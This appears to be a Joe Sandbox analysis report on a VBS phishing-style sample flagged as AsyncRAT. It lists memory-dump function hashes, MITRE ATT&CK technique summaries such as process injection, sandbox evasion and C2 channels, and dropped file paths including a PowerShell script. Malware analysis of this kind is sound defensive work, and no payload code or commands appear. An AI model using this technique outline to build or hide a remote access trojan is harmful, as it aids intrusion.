Instruction ID: 9c8d8167284cbbbe3689d098c93b75bf5e2e2b89e8216f4ce1a3f606f50cc7a8
Opcode Fuzzy Hash: 184fc2cc08e3364bbbc31bc7ee475ee3daf1ab71b73575e35ca014559656dff6
Instruction Fuzzy Hash: 6D318830FD02218FDBD4AF72D559A6E3694AF8420D791A83CD903D2946EF74D854CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02EF05D9 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.533595558.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ef0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e555f9b3b5e01eb3d85b024798fe1fe2e418f01748599e7a0fb90791c605bf0a
Instruction ID: e295a395bda802baa97b27515a2e676f6881abcfa39a177f2848e84e09390e9d
Opcode Fuzzy Hash: e555f9b3b5e01eb3d85b024798fe1fe2e418f01748599e7a0fb90791c605bf0a
Instruction Fuzzy Hash: AB217130BC02218FDBD4AF72D55867E37A4AF84249782A838D903C294AEF64D890CE60

Uniqueness

Uniqueness Score: -1.00%

Function 02E9D4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.533402138.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2e9d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123fda94b4418d46b56e30a55a350d9712c5fe03327187010334bce6f0379b0f
Instruction ID: aff5156f106669d02ab7c1415b6aa0c3f5676cb327d43135ed3f2e644a2befc9
Opcode Fuzzy Hash: 123fda94b4418d46b56e30a55a350d9712c5fe03327187010334bce6f0379b0f
Instruction Fuzzy Hash: B52125B2584244DFDF05EF14DDC0B6ABF65FB88328F24C56AE9094B216C336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E9D3B4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.533402138.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2e9d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff87708f100be01fdf5fa0e9a970279d09d0d8122c6d6ec2cffa53c29b71b249
Instruction ID: 87f5f7faa4f6b2051c143e20d0431a7cdcfe10ca9673b960312c1643b5fc64ec
Opcode Fuzzy Hash: ff87708f100be01fdf5fa0e9a970279d09d0d8122c6d6ec2cffa53c29b71b249
Instruction Fuzzy Hash: 072125B2544244DFDF09EF10DDC0B66BB65FB88328F24C56AE9094B246C336E856C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02E9D3AF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.533402138.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2e9d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9efadec781a849f8bd57d479fab03a07d5e8218666eed91641cde9ab8f7b1e9
Instruction ID: ffb327a4d10ffd1cdcd1b3b9e9a02f64c59e74005395aa2d287e07a630aeb130
Opcode Fuzzy Hash: c9efadec781a849f8bd57d479fab03a07d5e8218666eed91641cde9ab8f7b1e9
Instruction Fuzzy Hash: DC11E676544280CFCF15DF10D9C4B16BF71FB85328F28C6AAD8454B616C336E456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E9D49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.533402138.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2e9d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9efadec781a849f8bd57d479fab03a07d5e8218666eed91641cde9ab8f7b1e9
Instruction ID: 50c976dc7a79327c1ed2bf60cc68ea53c812da1fb223d473fb3f6250c4ce8a6b
Opcode Fuzzy Hash: c9efadec781a849f8bd57d479fab03a07d5e8218666eed91641cde9ab8f7b1e9
Instruction Fuzzy Hash: A111E676944280CFCF16DF14D9C4B1ABF71FB84328F28C6AAD8050B616C336D456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02EF0AF8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.533595558.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ef0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93283b62c29a9639b1952396bc6a9027f5ab63448e099f155bc40333222ee770
Instruction ID: 62ef7ad344f9365b73987cc360b6c76ac16fb72e1507884471c31dc86cdea037
Opcode Fuzzy Hash: 93283b62c29a9639b1952396bc6a9027f5ab63448e099f155bc40333222ee770
Instruction Fuzzy Hash: 82E0C2327002044F8754967EA888C9BB7DEEFC91B93140479E10EC7321CE61DC058790

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Re-RFQ - PN List.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: AsyncRAT

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\gia9ab2dg0.PS1

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.0.cs

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.out

C:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP

Windows Analysis Report
Re-RFQ - PN List.vbs

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre